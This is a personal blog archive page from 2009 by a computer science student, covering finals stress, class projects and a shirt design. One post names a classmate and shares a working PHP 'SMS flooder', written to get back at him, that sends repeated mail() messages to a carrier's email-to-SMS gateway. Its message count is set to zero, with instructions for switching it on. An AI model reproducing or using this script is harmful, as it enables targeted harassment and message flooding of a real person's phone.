Merry Christmas Everyone!
- December 24th, 2009
- Write comment
Archive for December, 2009
My Kids gon have the good life, good days, good nights, and not that wish i could life. -Big Sean
Finished my classes, passed all of them. Now I get to work on dealbk as much as I want
I’ve checked my Applied Linear Algebra class score about 8 times now and still nothing. I wish he would just put them up already so I can either sell my book or put it back on the shelf for next year… so nerve wrecking!
There’s a guy named David Martin in our class who ruined someone else’s project presentation in front of the entire class today due to his inability to be a decent person.
Even though it wasn’t my project he ruined I built an SMS flooder just for him. Marshall talked me out of using it on him… but I decided the code was good anyways. Enjoy!
———————-Begin smsflood.php———————-
<style type=”text/css”>
div.error{
font-weight: bolder;
color: #cc0000;
}
</style>
<h1>sms flooder</h1>
<?php
try {
/*
* AT&T @txt.att.net
* Verizon @vtext.com
*/
$to = “23489234@vtext.com”;
$subject = “Subject text”;
$body = “Body text.”;
$amount = 0;
if($amount == 0)
echo ‘<div class=”error”>SMS flooder turned off, edit smsflood.php line 12 to activate.</div>’;
for ($i = 1; $i <= $amount; ++$i){
if (mail($to, $subject, $body)) echo(“<p>Message number “. $i .” successfully sent!</p>”);
else echo(‘<p><div class=”error”>Message number ‘. $i .’ failed</div>’);
}
} catch (Exception $e) {
echo $e . ‘<br /><br />Something’s probably wrong with your SMTP servers amiright? Install and run <a href=”http://www.qksoft.com/qk-smtp-server/”>QK SMTP Server</a> first.’;
}
?>
———————-End smsflood.php———————-

This is something I’ve been thinking about for a while. I’m thinking about using the fuzzy stuff (similar to velvet), to make the RebelVC pattern. Also, If I can get the entire shirt done in that patern I will. I might do white on white instead. Let me know what you think.
I think I like doing what I do so much because it is one of the only things that I feel I have complete control over in life. I don’t think it’s a very usual thing for people to have found so early in life… so I’m very glad to have realized this. When I’m developing websites I have complete control and access to everything. There is nothing standing in my way because anything and everything is possible with what I have and the time I allocate to it. There is never a monetary block. :]

I know I should be stressing harder about finals but I feel like what happens will happen.
There’s a chance that I’ll have to retake my math class which means that my final class in college will be a very expensive one at about 2000 extra dollars. I really hope that the final grade cuts are as low as they have in the past for this teacher. I should have worked harder on my 2nd test. I just don’t understand matrices. The entire class is just a blur and the only reason why I ever get anything correct is because I’m just trying to memorize everything like it’s a function to be run. Wiring my head to do the right thing isn’t hard but reading the questions to fit what I know is difficult because I don’t understand how to apply the information properly. I just have to hope that the questions I see on the exam are questions that I’ve seen before with different numbers. GREAT!
All my other classes however I’m doing very well in and will not have problems in. I guess that’s how it’s supposed to be right? Automata, Programming Languages, Software Engineering. I’m a true CS major through and through.
Some good news
Anyways, our Programming Languages project went very well, most of it on Marshall’s back. Software Engineering went well too. http://www.glenndowning.info
RebelVC
Our site got a makeover and DealBk is coming along swimmingly!